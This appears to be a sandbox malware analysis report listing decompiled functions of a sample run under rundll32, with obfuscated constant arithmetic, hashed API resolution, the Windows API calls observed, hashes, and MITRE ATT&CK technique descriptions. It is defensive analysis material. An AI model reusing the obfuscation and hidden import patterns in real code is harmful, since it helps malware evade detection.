Opcode ID: 8ee9502bdab650b3620a3373f2489623bf75b53687d2f08f8d7269d441037b87
Instruction ID: ae4135957122ae25ec476f0146c5c833104089b9563c48f3cba5ee5fb0037e26
Opcode Fuzzy Hash: 8ee9502bdab650b3620a3373f2489623bf75b53687d2f08f8d7269d441037b87
Instruction Fuzzy Hash: B5113072C01218FBDF04EFE5E94AADEBFB4EB04304F208089E910B6250D3B55B649F81

Uniqueness

Uniqueness Score: -1.00%

Function 00287B20, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00287B20(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t39;
				intOrPtr* _t47;
				void* _t48;
				void* _t52;

				_t52 = __edx;
				E002856B2(_t39);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x5fd1db;
				_v8 = 0x3d27;
				_v8 = _v8 + 0xfffff494;
				_v8 = _v8 * 0xd;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x00002154;
				_v16 = 0x4286;
				_v16 = _v16 ^ 0xc1fbe110;
				_v16 = _v16 * 0x1f;
				_v16 = _v16 ^ 0x7d789428;
				_v20 = 0xab0b;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x00156522;
				_v12 = 0x931b;
				_v12 = _v12 ^ 0xf82042b4;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x8346c679;
				_t47 = E002904D5(0xfb, __edx, 0x8a7e764f, 0x1241114a, __ecx, __edx, 0);
				_t48 =  *_t47(0, _t52, _a12, _a8, _a12); // executed
				return _t48;
			}

0x00287b2a
0x00287b33
0x00287b38
0x00287b3f
0x00287b4b
0x00287b52
0x00287b65
0x00287b68
0x00287b6c
0x00287b73
0x00287b7a
0x00287b8a
0x00287b8d
0x00287b94
0x00287b9b
0x00287b9f
0x00287ba6
0x00287bad
0x00287bb4
0x00287bb8
0x00287bcb
0x00287bd9
0x00287bdf

APIs

ObtainUserAgentString.URLMON(00000000,00000000,00156522,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00287BD9

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: AgentObtainStringUser
String ID:
API String ID: 2681117516-0
Opcode ID: eb21f531882150f3084c6e11e19d8d349651dd4a0e18594071aacc76625caf02
Instruction ID: 5034b128c436f4e3b9756a98ab3820c20520fc95596d114b14734d5d9c2d8942
Opcode Fuzzy Hash: eb21f531882150f3084c6e11e19d8d349651dd4a0e18594071aacc76625caf02
Instruction Fuzzy Hash: 2B112371C01219EBDB14EFA9D98AADEBBB4FF00318F508098E92567292D3B45B14DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00283708, Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00283708(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				struct HINSTANCE__* _t58;

				_push(_a12);
				_push(_a8);
				E002856B2(_t49);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x3a6ac4;
				_v32 = 0x1f58c;
				_v20 = 0xda16;
				_v20 = _v20 << 6;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x000007d8;
				_v16 = 0xc632;
				_v16 = _v16 * 0x5e;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x3072f0c0;
				_v16 = _v16 ^ 0x30728ae3;
				_v12 = 0x2b62;
				_v12 = _v12 << 5;
				_v12 = _v12 + 0xeea3;
				_v12 = _v12 | 0x9d0e8eab;
				_v12 = _v12 ^ 0x9d0e92d8;
				_v8 = 0x59be;
				_v8 = _v8 * 0xc;
				_v8 = _v8 << 0xf;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x069d3080;
				E002904D5(0x132, __edx, 0xc9745c6b, 0xf9b1620b, __ecx, __edx, _a4);
				_t58 = LoadLibraryW(_a8); // executed
				return _t58;
			}

0x0028370e
0x00283711
0x00283719
0x0028371e
0x00283725
0x0028372e
0x00283735
0x0028373c
0x00283743
0x00283747
0x0028374b
0x00283752
0x00283765
0x00283768
0x0028376c
0x00283773
0x0028377a
0x00283781
0x00283785
0x0028378c
0x00283793
0x0028379a
0x002837aa
0x002837ad
0x002837b1
0x002837b5
0x002837c8
0x002837d3
0x002837d8

APIs

LoadLibraryW.KERNEL32(30728AE3), ref: 002837D3

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 197e89180ee6ad8ede3567d8a7ffd2df6677f249adb172faf506ffb0aacfaaeb
Instruction ID: 91b972fcbbd9bff56fa0715b7d9ee4e6347e4d03ca827b2c2b56531501aeb380
Opcode Fuzzy Hash: 197e89180ee6ad8ede3567d8a7ffd2df6677f249adb172faf506ffb0aacfaaeb
Instruction Fuzzy Hash: 0B21CDB5C0120DABDF45DFE4C94A5EEBBB4FB44308F108199E521A6291C3B98B58DF81

Uniqueness

Uniqueness Score: -1.00%

Function 0029F23C, Relevance: 1.5, APIs: 1, Instructions: 49
serviceCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0029F23C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t49;
				signed int _t51;
				void* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002856B2(_t40);
				_v8 = 0x224;
				_t51 = 0x60;
				_push(0x44ef1c65);
				_v8 = _v8 / _t51;
				_v8 = _v8 + 0x6797;
				_v8 = _v8 + 0xffff05c4;
				_v8 = _v8 ^ 0xffff46f6;
				_v16 = 0x944a;
				_v16 = _v16 + 0xffff0be3;
				_v16 = _v16 | 0xb1186cfb;
				_v16 = _v16 ^ 0xffff8f5a;
				_v12 = 0xd484;
				_v12 = _v12 + 0xffffefed;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x00310178;
				_v20 = 0x4577;
				_v20 = _v20 ^ 0x01418ea5;
				_v20 = _v20 ^ 0x0141ca29;
				_push(0xb49340c);
				E002904D5(0x344, _v8 % _t51);
				_t49 = CloseServiceHandle(_t56); // executed
				return _t49;
			}

0x0029f243
0x0029f246
0x0029f248
0x0029f24b
0x0029f24e
0x0029f250
0x0029f255
0x0029f266
0x0029f269
0x0029f26e
0x0029f274
0x0029f280
0x0029f287
0x0029f28e
0x0029f295
0x0029f29c
0x0029f2a3
0x0029f2aa
0x0029f2b1
0x0029f2b8
0x0029f2bc
0x0029f2c3
0x0029f2ca
0x0029f2d1
0x0029f2e4
0x0029f2e9
0x0029f2f2
0x0029f2f8

APIs

CloseServiceHandle.SECHOST(00000000,?,?,?,?,?,?,?,?,?,?,?,?,000043DE), ref: 0029F2F2

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 79899113739317072f9456874e3800ea4c3a137c92767be877347b61ad0d3eb2
Instruction ID: e7ce4e7508437d18dada3721afa6315eb5529026f460277d80dba8d349e0dad9
Opcode Fuzzy Hash: 79899113739317072f9456874e3800ea4c3a137c92767be877347b61ad0d3eb2
Instruction Fuzzy Hash: B5113775D00319BBDB48EFE8C84999EBBB1EB44314F108198E815662A1D3755B159F50

Uniqueness

Uniqueness Score: -1.00%

Function 00288EB8, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(D89CBF49), ref: 00288F6D

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: b23ee3a08fcf1092126b93ac41377679805a9d56590109bc2e64ae8c4e62792f
Instruction ID: a950b1efdfa4c68f54a8d684c66003c37422525cdafb64430576d42a102915ff
Opcode Fuzzy Hash: b23ee3a08fcf1092126b93ac41377679805a9d56590109bc2e64ae8c4e62792f
Instruction Fuzzy Hash: 6711F3B1D00208EBDF04DFE8C94689EBBB1FB40304F60C099E915AB290D7759B61DF81

Uniqueness

Uniqueness Score: -1.00%

Function 0028352B, Relevance: 1.5, APIs: 1, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0028352B(signed int __eax, void* __ecx, void* __eflags) {
				signed int _t40;
				void* _t48;
				signed int _t50;
				signed int _t51;
				int _t57;
				void* _t59;
				void* _t60;

				while(__eflags < 0) {
					_pop(_t50);
					 *(_t59 - 0xc) = __eax / _t50;
					_t40 =  *(_t59 - 0xc) * 0x7d;
					_t51 = 0x36;
					_push(0xf9b1620b);
					 *(_t59 - 0xc) = _t40;
					 *(_t59 - 0xc) =  *(_t59 - 0xc) ^ 0x000131e9;
					 *(_t59 - 0x10) = 0x4194;
					 *(_t59 - 0x10) =  *(_t59 - 0x10) ^ 0x724df7d3;
					 *(_t59 - 0x10) =  *(_t59 - 0x10) ^ 0x724dc2aa;
				}
				_t60 = _t59 + 1;
				asm("clc");
				asm("adc cl, cl");
				 *_t40 =  *_t40 + _t40;
				 *(_t60 - 8) =  *(_t60 - 8) ^ 0x16701329;
				 *(_t60 - 8) =  *(_t60 - 8) + 0xc25e;
				 *(_t60 - 8) =  *(_t60 - 8) ^ 0x1671dda1;
				 *(_t60 - 4) = 0xd264;
				 *(_t60 - 4) =  *(_t60 - 4) + 0x944a;
				_push(0x92c871b1);
				 *(_t60 - 4) =  *(_t60 - 4) / _t51;
				 *(_t60 - 4) =  *(_t60 - 4) << 6;
				 *(_t60 - 4) =  *(_t60 - 4) ^ 0x0001fad6;
				E002904D5(0x277,  *(_t60 - 4) % _t51);
				_t48 = CreateToolhelp32Snapshot(_t57, 0); // executed
				return _t48;
			}

0x0028352b
0x002834f6
0x002834fb
0x00283500
0x00283504
0x00283505
0x0028350d
0x00283510
0x00283517
0x0028351e
0x00283525
0x00283525
0x0028352d
0x0028352e
0x0028352f
0x00283531
0x00283533
0x0028353a
0x00283541
0x00283548
0x0028354f
0x0028355b
0x00283560
0x00283568
0x0028356c
0x0028357f
0x0028358a
0x00283590

APIs

CreateToolhelp32Snapshot.KERNEL32(?,00000000), ref: 0028358A

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 1631cb4cac79d0502352fde6a060350c1cde66bbf456acd4cad7dbb3f2d1d0e1
Instruction ID: dc74101618b1dd6614a7a009194aa477f74ff7fdb83b4478f48a7364df987a5b
Opcode Fuzzy Hash: 1631cb4cac79d0502352fde6a060350c1cde66bbf456acd4cad7dbb3f2d1d0e1
Instruction Fuzzy Hash: 20112771E05208EFEB48DFE5C94A5DEBBB1FB40304F20C19AD425AB290D7B91B448F81

Uniqueness

Uniqueness Score: -1.00%

Function 0028D867, Relevance: 1.3, APIs: 1, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E0028D867(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t32;
				int _t39;
				void* _t41;
				WCHAR* _t43;

				_push(_a16);
				_t43 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002856B2(_t32);
				_v20 = 0xc112;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x00187660;
				_v16 = 0x44a2;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x44a20c46;
				_v8 = 0x80d5;
				_v8 = _v8 << 6;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x406aec0c;
				_v12 = 0x3c7d;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x000035cf;
				_push(0xf9b1620b);
				_push(0x903a0366);
				_t41 = 0x28;
				E002904D5(_t41, __edx);
				_t39 = lstrcmpiW(_a4, _t43); // executed
				return _t39;
			}

0x0028d86e
0x0028d871
0x0028d873
0x0028d876
0x0028d879
0x0028d87c
0x0028d87d
0x0028d87e
0x0028d883
0x0028d88d
0x0028d891
0x0028d898
0x0028d89f
0x0028d8a3
0x0028d8aa
0x0028d8b1
0x0028d8b5
0x0028d8b9
0x0028d8c0
0x0028d8c7
0x0028d8cb
0x0028d8de
0x0028d8e6
0x0028d8ed
0x0028d8ee
0x0028d8fa
0x0028d900

APIs

lstrcmpiW.KERNELBASE(000035CF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0028D8FA

Memory Dump Source

Source File: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000010.00000002.2338522994.00000000002A1000.00000040.00020000.sdmp Download File
Associated: 00000010.00000002.2338530334.00000000002A3000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 5112a81a2239dc82ca800b34fc2509730bf944e1d5fe2a59776ea9b54c5e6d15
Instruction ID: 1c95b1f8e83f19f5ed74de4cd8d293275994f9dc4d63858089cda29124e90c97
Opcode Fuzzy Hash: 5112a81a2239dc82ca800b34fc2509730bf944e1d5fe2a59776ea9b54c5e6d15
Instruction Fuzzy Hash: 3A111272C01218ABEF41EFE4C90A8DEBBB4FB00354F108498E92562251D7B58B24DF81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002A8330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 002A8361
GetSystemMetrics.USER32(00000000), ref: 002A839D
GetSystemMetrics.USER32(00000001), ref: 002A83A8

Strings

DISPLAY, xrefs: 002A83C9
/}Au, xrefs: 002A839D, 002A83A8
GetMonitorInfo, xrefs: 002A8348

Memory Dump Source

Source File: 00000010.00000002.2338537535.00000000002A4000.00000020.00020000.sdmp, Offset: 002A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2a4000_rundll32.jbxd

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: /}Au$DISPLAY$GetMonitorInfo
API String ID: 4250584380-1428758730
Opcode ID: fb8d8bb3fb056446f36ae3173238a8ddf0b88d2f8b87f3c3991b40f8945d92fe
Instruction ID: a56700dd64d6ac11fc37c7e67ba6455f141a592f61c04349ec00ccf11b74174c
Opcode Fuzzy Hash: fb8d8bb3fb056446f36ae3173238a8ddf0b88d2f8b87f3c3991b40f8945d92fe
Instruction Fuzzy Hash: A11129316513059FDB20CF20AC88BB7B7E8EB06B50F004929FD46DB241EFB0A814CB90

Uniqueness

Uniqueness Score: -1.00%

Function 002A85AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 002A85E5
GetSystemMetrics.USER32(00000000), ref: 002A860A
GetSystemMetrics.USER32(00000001), ref: 002A8615

Strings

/}Au, xrefs: 002A860A, 002A8615
EnumDisplayMonitors, xrefs: 002A85C4

Memory Dump Source

Source File: 00000010.00000002.2338537535.00000000002A4000.00000020.00020000.sdmp, Offset: 002A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2a4000_rundll32.jbxd

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: /}Au$EnumDisplayMonitors
API String ID: 1389147845-1105134141
Opcode ID: 7c74f0b42cfe89c72f0bbaea025c93e1ba7f29d653b092523e1219eee4319ba8
Instruction ID: 3553bd3f4e43154c843d10a67df427e0afb007fdc7bfba76bc7bbbe85e7e16c2
Opcode Fuzzy Hash: 7c74f0b42cfe89c72f0bbaea025c93e1ba7f29d653b092523e1219eee4319ba8
Instruction Fuzzy Hash: EF315EB291120AAFDB10DFA4DC88AEFB7BCAB16700F004526E915D7241EF34D9248BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002A8404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002A8471
GetSystemMetrics.USER32(00000001), ref: 002A847C

Strings

DISPLAY, xrefs: 002A849D
/}Au, xrefs: 002A8471, 002A847C
GetMonitorInfoA, xrefs: 002A841C

Memory Dump Source

Source File: 00000010.00000002.2338537535.00000000002A4000.00000020.00020000.sdmp, Offset: 002A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2a4000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoA
API String ID: 4116985748-2822609925
Opcode ID: 8e51eed75cdfc362c48d428d85dc6f3e7e7899bdc4078ecdf372f5f09ca67091
Instruction ID: 3d028dc87c8a1ba1d23302151e9a1e0c98b0487495ddeea837b97de823ca485a
Opcode Fuzzy Hash: 8e51eed75cdfc362c48d428d85dc6f3e7e7899bdc4078ecdf372f5f09ca67091
Instruction Fuzzy Hash: 391126316617069FD720DF60EC8CBA7BBE8EB0A360F004429ED458F241DFB0A8548BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002A84D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002A8545
GetSystemMetrics.USER32(00000001), ref: 002A8550

Strings

DISPLAY, xrefs: 002A8571
/}Au, xrefs: 002A8545, 002A8550
GetMonitorInfoW, xrefs: 002A84F0

Memory Dump Source

Source File: 00000010.00000002.2338537535.00000000002A4000.00000020.00020000.sdmp, Offset: 002A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2a4000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoW
API String ID: 4116985748-1558784340
Opcode ID: 578b025a2c1566742f4f8851de51db141a10d61a3a99c9f87340d3dfadad22c4
Instruction ID: 709b0d5d472a71e0256a837cdfdaeee2af6739ecc0c84024d267de57ab4b3eb0
Opcode Fuzzy Hash: 578b025a2c1566742f4f8851de51db141a10d61a3a99c9f87340d3dfadad22c4
Instruction Fuzzy Hash: 46110031E613059FD760DF60AC88BA7B7E8EB16350F45452AED49CB281DFB0A8148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002A8298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002A82E6
GetSystemMetrics.USER32(00000001), ref: 002A82F8

Strings

MonitorFromPoint, xrefs: 002A82AA
/}Au, xrefs: 002A82E6, 002A82F8

Memory Dump Source

Source File: 00000010.00000002.2338537535.00000000002A4000.00000020.00020000.sdmp, Offset: 002A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2a4000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromPoint
API String ID: 4116985748-3670600901
Opcode ID: 153faa2a35762cf4d69d8cb7afd4f461b938a782da3f56c11edd7d50e4ce1ef6
Instruction ID: 7528fd5deafc572e54c8131f37d63827b3c795658911e3a20eb63c7732af2e08
Opcode Fuzzy Hash: 153faa2a35762cf4d69d8cb7afd4f461b938a782da3f56c11edd7d50e4ce1ef6
Instruction Fuzzy Hash: 4901D631A51349AFDF108F51EC8CB9E7B65EB62B90F044065F9048F112CFB0AD748BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002A8170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002A81C1
GetSystemMetrics.USER32(00000001), ref: 002A81CD

Strings

MonitorFromRect, xrefs: 002A8185
/}Au, xrefs: 002A81C1, 002A81CD

Memory Dump Source

Source File: 00000010.00000002.2338537535.00000000002A4000.00000020.00020000.sdmp, Offset: 002A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2a4000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromRect
API String ID: 4116985748-120404372
Opcode ID: de4004b311924c18a13586b73ada0f25eafd65aeb978a737673534fab7fb5943
Instruction ID: 8c5bcc2ddffd73123e765587f012ff3ba0b83e174dc6b3c4add8bab8e32937af
Opcode Fuzzy Hash: de4004b311924c18a13586b73ada0f25eafd65aeb978a737673534fab7fb5943
Instruction Fuzzy Hash: D3014B3165035A9FD7209F15EC8DB57BBA9E752391F148462ED08CA202DE719C668BB0

Uniqueness

Uniqueness Score: -1.00%

Function 002E2B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

DdeCreateStringHandleA.USER32(00000015,00000000), ref: 002E2B7C
DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 002E2BA9
DdeGetLastError.USER32(00000015), ref: 002E2BBB
DdeFreeStringHandle.USER32(00000015,?), ref: 002E2BCD

Memory Dump Source

Source File: 00000010.00000002.2338537535.00000000002A4000.00000020.00020000.sdmp, Offset: 002A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2a4000_rundll32.jbxd

Similarity

API ID: HandleString$ClientCreateErrorFreeLastTransaction
String ID:
API String ID: 2421758087-0
Opcode ID: 16ea14fb4d981cbafc3c5bd8acd16d124b58f30e5e80647fa54f04f10902993b
Instruction ID: bdeb768019212b18d0e1305054350bbf50c3fc8cc41367e8f4af137910f43e4d
Opcode Fuzzy Hash: 16ea14fb4d981cbafc3c5bd8acd16d124b58f30e5e80647fa54f04f10902993b
Instruction Fuzzy Hash: 1B2124742542809FDB40EF69C8C5F6AB7E8AB49710F548195F988CF2A6D771E890CB60

Uniqueness

Uniqueness Score: -1.00%

Function 002E1428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

DdeQueryConvInfo.USER32(?,?,00000060), ref: 002E14BF

Strings

0., xrefs: 002E1607
`, xrefs: 002E1498

Memory Dump Source

Source File: 00000010.00000002.2338537535.00000000002A4000.00000020.00020000.sdmp, Offset: 002A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2a4000_rundll32.jbxd

Similarity

API ID: ConvInfoQuery
String ID: 0.$`
API String ID: 701148680-2251769067
Opcode ID: 539383ce4d356be8f69774817d8d9ecd93f23669cb5fbfc1f3d58dfa5e1c0e71
Instruction ID: c50a18fda6fac33bd4947082407b02d73fd6f95018f5667c107584d95cbe316a
Opcode Fuzzy Hash: 539383ce4d356be8f69774817d8d9ecd93f23669cb5fbfc1f3d58dfa5e1c0e71
Instruction Fuzzy Hash: AB516576A6029A8BCB14DE5AD9895AE73BDFB48350F944030FD0AD7344CA30DD35CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 002A80E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 002A8110

Strings

/}Au, xrefs: 002A80FD, 002A810A, 002A8110
GetSystemMetrics, xrefs: 002A80F8

Memory Dump Source

Source File: 00000010.00000002.2338537535.00000000002A4000.00000020.00020000.sdmp, Offset: 002A4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2a4000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$GetSystemMetrics
API String ID: 4116985748-3773086709
Opcode ID: 2299253467d4a7955f79c206fe3019f688879e4e58829cbbedb23ba8142dfda9
Instruction ID: 59fb01f8c9e4b3ac331972943f16df320bb61b9daf1e976e12c888a9b9c367c6
Opcode Fuzzy Hash: 2299253467d4a7955f79c206fe3019f688879e4e58829cbbedb23ba8142dfda9
Instruction Fuzzy Hash: 01F090B06352864FDB549B34ADCC722358AE753370F644A21E12E4A2D6CE7988668694

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
